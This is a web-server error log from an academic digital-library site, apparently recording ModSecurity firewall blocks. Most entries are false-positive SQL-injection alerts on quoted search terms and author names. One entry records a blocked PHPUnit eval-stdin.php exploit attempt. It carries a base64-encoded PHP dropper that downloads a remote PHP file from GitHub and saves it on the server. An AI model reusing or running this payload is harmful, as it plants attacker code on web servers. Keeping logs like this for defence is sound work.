"digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyIs8Co-f0AAMKV2WsAAAAT"]
[Mon Aug 28 18:45:17.556850 2023] [:error] [pid 49888] [client 47.128.31.185] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Developing countries\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyIzcCo-f0AAMLgzu4AAAAC"]
[Mon Aug 28 18:48:04.966026 2023] [:error] [pid 49899] [client 47.128.31.0] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Bermawi P. Iskandar\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyJdMCo-f0AAMLrjYoAAAAM"]
[Mon Aug 28 18:53:02.409676 2023] [:error] [pid 49985] [client 47.128.26.129] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Fatimah Mahmud\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyKnsCo-f0AAMNBp6kAAAAK"]
[Mon Aug 28 18:53:13.266158 2023] [:error] [pid 49985] [client 85.208.96.211] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Resilience\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyKqcCo-f0AAMNBp6oAAAAK"]
[Mon Aug 28 18:54:10.643666 2023] [:error] [pid 49982] [client 47.128.20.120] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Teddy Marcus Zakaria\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyK4sCo-f0AAMM@0oMAAAAE"]
[Mon Aug 28 18:55:58.962218 2023] [:error] [pid 50032] [client 85.208.96.210] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22A3\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyLTsCo-f0AAMNwlg8AAAAP"]
[Mon Aug 28 18:58:13.123532 2023] [:error] [pid 50029] [client 47.128.25.89] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Social influence\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyL1cCo-f0AAMNt@2QAAAAQ"]
[Mon Aug 28 19:08:05.148807 2023] [:error] [pid 50126] [client 47.128.22.214] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Lean barriers\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyOJcCo-f0AAMPOfJ4AAAAR"]
[Mon Aug 28 19:09:03.171097 2023] [:error] [pid 50240] [client 47.128.30.122] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Cheng Wan\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyOX8Co-f0AAMRAHdAAAAAH"]
[Mon Aug 28 19:09:35.763347 2023] [:error] [pid 50203] [client 47.128.26.197] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Help format\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyOf8Co-f0AAMQboG8AAAAN"]
[Mon Aug 28 19:27:04.512465 2023] [:error] [pid 50694] [client 47.128.30.96] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Nur Hidayat\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOySmMCo-f0AAMYGbK0AAAAH"]
[Mon Aug 28 19:28:54.208135 2023] [:error] [pid 50734] [client 85.208.96.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Visual Basic 4.0\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyTBsCo-f0AAMYuLZIAAAAP"]
[Mon Aug 28 19:38:10.378789 2023] [:error] [pid 50859] [client 85.208.96.212] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22V.Balkov\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyVMsCo-f0AAMaro3oAAAAE"]
[Mon Aug 28 19:39:45.601380 2023] [:error] [pid 50846] [client 47.128.31.44] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Self-reported data\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyVkcCo-f0AAMae5GsAAAAU"]
[Mon Aug 28 19:49:24.010664 2023] [:error] [pid 51048] [client 85.208.96.194] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22James Martin\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyX1MCo-f0AAMdoV9QAAAAH"]
[Mon Aug 28 19:51:39.736441 2023] [:error] [pid 51062] [client 85.208.96.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Job satisfaction\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyYW8Co-f0AAMd2r6QAAAAU"]
[Mon Aug 28 19:53:52.107393 2023] [:error] [pid 51115] [client 47.128.28.65] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Penuntun Praktis\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyY4MCo-f0AAMerTXAAAAAL"]
[Mon Aug 28 19:58:45.580792 2023] [:error] [pid 51256] [client 47.128.17.27] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Design of Earthquake\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyaBcCo-f0AAMg42xgAAAAE"]
[Mon Aug 28 20:00:09.374543 2023] [:error] [pid 51240] [client 47.128.19.190] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Williamson rheological model\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyaWcCo-f0AAMgoBE4AAAAQ"]
[Mon Aug 28 20:10:03.662170 2023] [:error] [pid 51389] [client 47.128.21.140] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:subject. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:subject: \\x22Digital library\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOycq8Co-f0AAMi93wcAAAAC"]
[Mon Aug 28 20:10:55.112791 2023] [:error] [pid 51237] [client 85.208.96.201] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Turner, Wayne C.\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyc38Co-f0AAMglSd4AAAAF"]
[Mon Aug 28 20:12:36.620445 2023] [:error] [pid 51502] [client 103.195.58.21] ModSecurity: Access denied with code 403 (phase 2). Pattern match "<\\\\?(?!xml)" at ARGS_NAMES:<?php eval('?>'.base64_decode('PD9waHAKZnVuY3Rpb24gYWRtaW5lcigkdXJsLCAkaXNpKSB7CgkkZnAgPSBmb3BlbigkaXNpLCAidyIpOwoJJGNoID0gY3VybF9pbml0KCk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfVVJMLCAkdXJsKTsKCWN1cmxfc2V0b3B0KCRjaCwgQ1VSTE9QVF9CSU5BUllUUkFOU0ZFUiwgdHJ1ZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfUkVUVVJOVFJBTlNGRVIsIHRydWUpOwoJY3VybF9zZXRvcHQoJGNoLCBDVVJMT1BUX1NTTF9WRVJJRllQRUVSLCBmYWxzZSk7CgljdXJsX3NldG9wdCgkY2gsIENVUkxPUFRfRklMRSwgJGZwKTsKCXJldHVybiBjdXJsX2V4ZWMoJGNoKTsKCWN1cmxfY2xvc2UoJGNoKTsKCWZjbG9zZSgkZnApOwoJb2JfZmx1c2goKTsKCWZsdXNoKCk7Cn0KaWYoYWRtaW5lcigiaHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0xhbmFuZ0FraXJhL09uaUNoYW4vbWFpbi9vb3BzLnBocCIsImF3ZXNhLnBocCIpKSB7CgllY2hvICJMYW5hbmdHYW50ZW5nIjsKfSBlbHNlIHsKCWVjaG8gImZhaWwiOwp9Cj8 ')); ?>. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "230"] [id "959151"] [rev "2"] [msg "PHP Injection Attack"] [severity "CRITICAL"] [ver "OWAS [hostname "digilibft.unla.ac.id"] [uri "/vendor/phpunit/phpunit/src/Util/PHP/eval-stdin.php"] [unique_id "ZOydRMCo-f0AAMkuLvsAAAAQ"]
[Mon Aug 28 20:21:18.724542 2023] [:error] [pid 51653] [client 85.208.96.199] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22James\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyfTsCo-f0AAMnFbpgAAAAC"]
[Mon Aug 28 20:26:43.445549 2023] [:error] [pid 51669] [client 192.99.7.188] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Alfonso Jesus Gil-L\\xc3\\xb3pez\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOygk8Co-f0AAMnVm8cAAAAW"]
[Mon Aug 28 20:26:45.704579 2023] [:error] [pid 51669] [client 192.99.7.188] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Andr\\xc3\\xa9 L.M. Vilela\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOyglcCo-f0AAMnVm8gAAAAW"]
[Mon Aug 28 20:26:47.670612 2023] [:error] [pid 51669] [client 192.99.7.188] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22F\\xc3\\xa1bio Neves Puglieri\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOygl8Co-f0AAMnVm8kAAAAW"]
[Mon Aug 28 20:26:49.709697 2023] [:error] [pid 51669] [client 192.99.7.188] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(^[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+|[\\"'`\\xc2\\xb4\\xe2\\x80\\x99\\xe2\\x80\\x98;]+$)" at ARGS:author. [file "/usr/share/modsecurity-crs/activated_rules/modsecurity_crs_41_sql_injection_attacks.conf"] [line "64"] [id "981318"] [rev "2"] [msg "SQL Injection Attack: Common Injection Testing Detected"] [data "Matched Data: \\x22 found within ARGS:author: \\x22Vieroslav Moln\\xc3\\xa1r\\x22"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "8"] [tag "OWASP_CRS/WEB_ATTACK/SQL_INJECTION"] [tag "WASCTC/WASC-19"] [tag "OWASP_TOP_10/A1"] [tag "OWASP_AppSensor/CIE1"] [tag "PCI/6.5.2"] [hostname "digilibft.unla.ac.id"] [uri "/index.php"] [unique_id "ZOygmcCo-f0AAMnVm8oAAAAW"]
